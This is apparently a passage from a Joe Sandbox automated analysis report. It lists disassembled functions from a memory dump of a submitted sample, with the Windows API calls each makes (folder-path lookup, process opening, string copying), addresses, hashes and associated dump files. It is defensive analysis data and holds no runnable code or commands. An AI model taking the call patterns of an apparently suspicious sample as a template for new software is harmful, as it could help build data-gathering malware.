                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: strlen
                          • String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                          • API String ID: 39653677-4138519520
                          • Opcode ID: ca13ade2c28b2da9062c63d1b3a7e364067111c15b31b3d9df02294e2bff1259
                          • Instruction ID: 9271ed72ca585625899bbb83fb01dde85ae86430bd87fba90809ef96712d8ea4
                          • Opcode Fuzzy Hash: ca13ade2c28b2da9062c63d1b3a7e364067111c15b31b3d9df02294e2bff1259
                          • Instruction Fuzzy Hash: 7C215A3951018B9FC720EA39D4A47DDF7E7DF80B66FE44096E8184B341E332098AD796
                          APIs
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0063EBB4
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063EBE3
                          • lstrcat.KERNEL32(?,00000000), ref: 0063EBF1
                          • lstrcat.KERNEL32(?,0129D930), ref: 0063EC0C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$FolderPathlstrcpy
                          • String ID:
                          • API String ID: 818526691-0
                          • Opcode ID: cf30b3fbc51f9f5c75d3f2fc64913c3499e0a167d317e67dab1ed7fdefe6dbb8
                          • Instruction ID: 584934b5a3d13867eb3a3601ae71bff5fb34119f0f13d272ce8b2ef54b73e12c
                          • Opcode Fuzzy Hash: cf30b3fbc51f9f5c75d3f2fc64913c3499e0a167d317e67dab1ed7fdefe6dbb8
                          • Instruction Fuzzy Hash: 8431B971A10529EBCB51EF64EC52BED77B5BF48301F1005A9F60697284DE349E448F94
                          APIs
                          • OpenProcess.KERNEL32(00000410,00000000), ref: 00644492
                          • GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 006444AD
                          • CloseHandle.KERNEL32(00000000), ref: 006444B4
                          • lstrcpy.KERNEL32(00000000,?), ref: 006444E7
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                          • String ID:
                          • API String ID: 4028989146-0
                          • Opcode ID: ad22754f2ef57bfb8d168792935169b9fa4aa7cde3c8f616af0ce99228dbae0f
                          • Instruction ID: 2f14a37865f54dbee474e5a3db7d2aa01d6ba46dc2a36ab4e3be64820c9eadb8
                          • Opcode Fuzzy Hash: ad22754f2ef57bfb8d168792935169b9fa4aa7cde3c8f616af0ce99228dbae0f
                          • Instruction Fuzzy Hash: F8F0FCF09017256BE7209B749C49BEABAE9FF14305F000591FA89D72C0DFB88C848B90
                          APIs
                          • __getptd.LIBCMT ref: 00648FDD
                            • Part of subcall function 006487FF: __amsg_exit.LIBCMT ref: 0064880F
                          • __getptd.LIBCMT ref: 00648FF4
                          • __amsg_exit.LIBCMT ref: 00649002
                          • __updatetlocinfoEx_nolock.LIBCMT ref: 00649026
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                          • String ID:
                          • API String ID: 300741435-0
                          • Opcode ID: 53eeb1f8dff83bf67eb43817a87e0c551d7c9f34fc49af425adca6aea98107f0
                          • Instruction ID: f166ffea4b17a51a9848e2c01258d2305ce1a5a80a2a807d484d6329ec000ff1
                          • Opcode Fuzzy Hash: 53eeb1f8dff83bf67eb43817a87e0c551d7c9f34fc49af425adca6aea98107f0
                          • Instruction Fuzzy Hash: 52F0B4329487109FDBE0BF78A80BB5E37A36F10B21F24411DF444AB2D2DF645900DA6D
                          APIs
                          • lstrlen.KERNEL32(------,00625BEB), ref: 0064731B
                          • lstrcpy.KERNEL32(00000000), ref: 0064733F
                          • lstrcat.KERNEL32(?,------), ref: 00647349
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcatlstrcpylstrlen
                          • String ID: ------
                          • API String ID: 3050337572-882505780
                          • Opcode ID: cab6199fbb4c3c864efed2d61faffeb9a75955105be6b9589437f2960840f2ed
                          • Instruction ID: a27cfdd22a1704ce7615db6769d1918c4d41bf55fe041290e56da198cd54c0eb
                          • Opcode Fuzzy Hash: cab6199fbb4c3c864efed2d61faffeb9a75955105be6b9589437f2960840f2ed
                          • Instruction Fuzzy Hash: 3DF0C974911712DFDB659F35D848926BAFAFF84701318882DA8DAC7314EB34E840DB10
                          APIs
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621557
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 00621579
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                            • Part of subcall function 00621530: lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633422
                          • lstrcpy.KERNEL32(00000000,?), ref: 0063344B
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633471
                          • lstrcpy.KERNEL32(00000000,?), ref: 00633497
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 741e812b788fe29f0b94ca31c043437a274da5db3665348641755be974a6bdc3
                          • Instruction ID: fd37c9f39cdbd2b9d260ceb8de4e16d4f62c681177b638697426b5c0310eafc4
                          • Opcode Fuzzy Hash: 741e812b788fe29f0b94ca31c043437a274da5db3665348641755be974a6bdc3
                          • Instruction Fuzzy Hash: C8120A70A012218FDB28CF19C554B65B7E6BF45329F19C0AEE809CB3A2D776DD42CB84
                          APIs
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637C94
                          • std::_Xinvalid_argument.LIBCPMT ref: 00637CAF
                            • Part of subcall function 00637D40: std::_Xinvalid_argument.LIBCPMT ref: 00637D58
                            • Part of subcall function 00637D40: std::_Xinvalid_argument.LIBCPMT ref: 00637D76
                            • Part of subcall function 00637D40: std::_Xinvalid_argument.LIBCPMT ref: 00637D91
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: string too long
                          • API String ID: 909987262-2556327735
                          • Opcode ID: 177b0de2cd1650a5e7ccb056248f10d88ea9b28cc544b571c1ea36317229cf02
                          • Instruction ID: ac1ff1e8f40348df547510586778ba6dab97188b71ea16e11eb594798acd3d56
                          • Opcode Fuzzy Hash: 177b0de2cd1650a5e7ccb056248f10d88ea9b28cc544b571c1ea36317229cf02
                          • Instruction Fuzzy Hash: 0C31D4B23086149FE7349E6CE8809AAF3EBEF91760F20566AF5458B741D7719C4183E8
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,?), ref: 00626F74
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00626F7B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateProcess
                          • String ID: @
                          • API String ID: 1357844191-2766056989
                          • Opcode ID: e355b0706bcd2b49e976105cef3d2a5702761890517ce529a66f424950adb2bd
                          • Instruction ID: 0eeea062d58b5ef2b1a4180dea969d2fcd5ad97430270673ecd5f0cb1eff7e16
                          • Opcode Fuzzy Hash: e355b0706bcd2b49e976105cef3d2a5702761890517ce529a66f424950adb2bd
                          • Instruction Fuzzy Hash: 37218171600B119BEB20CF24ED85BB673EAEB40705F44887CF986CBA84E779E945CB50
                          APIs
                          • lstrcpy.KERNEL32(00000000,0064CFEC), ref: 0064244C
                          • lstrlen.KERNEL32(00000000), ref: 006424E9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00642570
                          • lstrlen.KERNEL32(00000000), ref: 00642577
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen
                          • String ID:
                          • API String ID: 2001356338-0
                          • Opcode ID: 232fa06a03ab4ce8212a0759f1b3722e057e333810c19676639ff892de57acdd
                          • Instruction ID: cf992fdcd4fb75956b81da812d92acf4fe9a06b11c8f850dc2a512423f3c5817
                          • Opcode Fuzzy Hash: 232fa06a03ab4ce8212a0759f1b3722e057e333810c19676639ff892de57acdd
                          • Instruction Fuzzy Hash: 0381C2B0E002069BDB14DF95DC54BAEB7B6FF84301F64806DE508A7381EB799D46CB94
                          APIs
                          • lstrcpy.KERNEL32(00000000), ref: 006415A1
                          • lstrcpy.KERNEL32(00000000,?), ref: 006415D9
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641611
                          • lstrcpy.KERNEL32(00000000,?), ref: 00641649
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000AF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196012801.0000000000B02000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196121789.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2196137696.0000000000C96000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_620000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID:
                          • API String ID: 3722407311-0
                          • Opcode ID: 697b79930918a8f242a8e8cabae46f650634bb2380570b4bab47cacbf1fdd84c
                          • Instruction ID: e79aba35ceb10aabfa844821f28abc7b11e5e424bcc5ee74bb7012d19772791a
                          • Opcode Fuzzy Hash: 697b79930918a8f242a8e8cabae46f650634bb2380570b4bab47cacbf1fdd84c
                          • Instruction Fuzzy Hash: CA21D7B4611B029BD728DF2AD469A57B7F6BF45700B044A1CE49ACBB40DB34F881CFA4
                          APIs
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000), ref: 0062162D
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000,?), ref: 0062164F
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000,?), ref: 00621671
                            • Part of subcall function 00621610: lstrcpy.KERNEL32(00000000,?), ref: 00621693
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621557
                          • lstrcpy.KERNEL32(00000000,?), ref: 00621579
                          • lstrcpy.KERNEL32(00000000,?), ref: 0062159B
                          • lstrcpy.KERNEL32(00000000,?), ref: 006215FF
                          Memory Dump Source
                          • Source File: 00000000.00000002.2195559787.0000000000621000.00000040.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                          • Associated: 00000000.00000002.2195543682.0000000000620000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.00000000006CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195559787.0000000000858000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195739005.000000000086A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.000000000086C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2195756620.00000000009EB000.00000040.00000001.01000000.00000003.sdmpDownload File
